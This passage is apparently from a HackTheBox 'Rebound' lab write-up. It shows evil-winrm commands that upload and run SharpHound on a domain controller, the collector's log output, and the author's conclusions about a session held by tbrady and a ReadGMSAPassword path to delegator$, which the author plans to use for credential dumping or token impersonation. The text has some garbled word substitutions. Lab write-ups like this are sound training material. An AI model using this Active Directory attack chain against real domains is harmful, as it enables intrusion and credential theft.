BloodHound
I will run BloodHound again to get a better overview of the domain since the initial attempt earlier with the python-bloodhound ingestor was not as precise as I anticipated This time, I will be using SharpHound locally from the existing session
*evil-winrm* ps c:\Users\winrm_svc\Documents> upload ./SharpHound.ps1 C:\Users\winrm_svc\Documents
info: Uploading /home/kali/archive/htb/labs/rebound/SharpHound.ps1 to C:\Users\winrm_svc\Documents
data: 1744464 bytes of 1744464 bytes copied
info: Upload successful!
*evil-winrm* ps c:\Users\winrm_svc\Documents> upload ./SharpHound.exe C:\Users\winrm_svc\Documents
info: Uploading /home/kali/archive/htb/labs/rebound/SharpHound.exe to C:\Users\winrm_svc\Documents
data: 1402196 bytes of 1402196 bytes copied
info: Upload successful!
*evil-winrm* ps c:\Users\winrm_svc\Documents> . .\SharpHound.ps1Delivery Complete
*evil-winrm* ps c:\Users\winrm_svc\Documents> Invoke-BloodHound -CollectionMethods All
*evil-winrm* ps c:\Users\winrm_svc\Documents> download rebound.htb_20230912052744_BloodHound.zip rebound.htb_20230912052744_BloodHound.zip
info: Downloading C:\Users\winrm_svc\Documents\rebound.htb_20230912052744_BloodHound.zip to rebound.htb_20230912052744_BloodHound.zip
info: Download successful
*evil-winrm* ps c:\Users\winrm_svc\Documents> .\SharpHound.exe -c All
2023-09-12t08:21:32.4392009-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2023-09-12t08:21:32.6267183-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-09-12t08:21:32.6423462-07:00|INFORMATION|Initializing SharpHound at 8:21 AM on 9/12/2023
2023-09-12t08:21:33.1423302-07:00|INFORMATION|Loaded cache with stats: 63 ID to type mappings.
63 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2023-09-12t08:21:33.1579523-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-09-12t08:21:33.3299150-07:00|INFORMATION|Beginning LDAP search for rebound.htb
2023-09-12t08:21:33.3768090-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-09-12t08:21:33.3928067-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-09-12t08:22:03.7206887-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 38 MB RAM
2023-09-12t08:22:15.4860825-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2023-09-12t08:22:15.5329585-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2023-09-12t08:22:15.6110913-07:00|INFORMATION|Status: 104 objects finished (+104 2.476191)/s -- Using 41 MB RAM
2023-09-12t08:22:15.6110913-07:00|INFORMATION|Enumeration finished in 00:00:42.2925788
2023-09-12t08:22:15.6892232-07:00|INFORMATION|Saving cache with stats: 63 ID to type mappings.
63 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2023-09-12t08:22:15.6892232-07:00|INFORMATION|SharpHound Enumeration Completed at 8:22 AM on 9/12/2023! Happy Graphing!Executing SharpHound
Unlike earlier, I get the precise result this time
It now shows the Service Users OU as well as the ACEs
batch_runner
One thing that I have not been paying attention to was the presence of the batch_runner account, which is part of the Service Users OU
Active Session
Apparently, the tbrady user has an active session to the DC host
looking further into the hassession edge, it might be possible to steal the authentication hash of the tbrady user via credential dumping or token impersonation
Solution found. Moving on to the Rebound phase
ReadgMSAPassword
The tbrady user has ReadGMSAPassword access to the delegator$ account
This was initially Rebound by adPEAS earlier and it appears to be the next target route after compromising the tbrady user